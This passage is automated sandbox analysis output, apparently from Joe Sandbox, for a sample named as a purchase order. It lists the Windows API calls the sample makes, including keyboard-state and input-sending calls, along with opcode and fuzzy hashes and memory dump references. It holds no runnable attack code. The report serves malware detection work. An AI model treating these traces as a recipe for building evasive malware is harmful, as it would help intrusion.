                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                    • String ID:
                                                    • API String ID: 896007046-0
                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                    APIs
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                    • GetFocus.USER32 ref: 00448ACF
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                    • String ID:
                                                    • API String ID: 3429747543-0
                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu$\VH
                                                    • API String ID: 3164766367-2432546070
                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 3850602802-3636473452
                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 3985565216-0
                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0041F707
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _free.LIBCMT ref: 0041F71A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID: [B
                                                    • API String ID: 1020059152-632041663
                                                    • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                    • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                    APIs
                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                    • String ID:
                                                    • API String ID: 3220332590-0
                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1612042205-0
                                                    • Opcode ID: 4098f9dc93ff2837199216be0bc4cded73a78b8dc231ed2406addd4e84e5e7a2
                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                    • Opcode Fuzzy Hash: 4098f9dc93ff2837199216be0bc4cded73a78b8dc231ed2406addd4e84e5e7a2
                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: >$U$\
                                                    • API String ID: 2666721431-237099441
                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                    • String ID:
                                                    • API String ID: 2221674350-0
                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$_wcscat
                                                    • String ID:
                                                    • API String ID: 2037614760-0
                                                    • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                    • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                    • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                    • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                    • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                    • String ID:
                                                    • API String ID: 960795272-0
                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 4189319755-0
                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                    APIs
                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
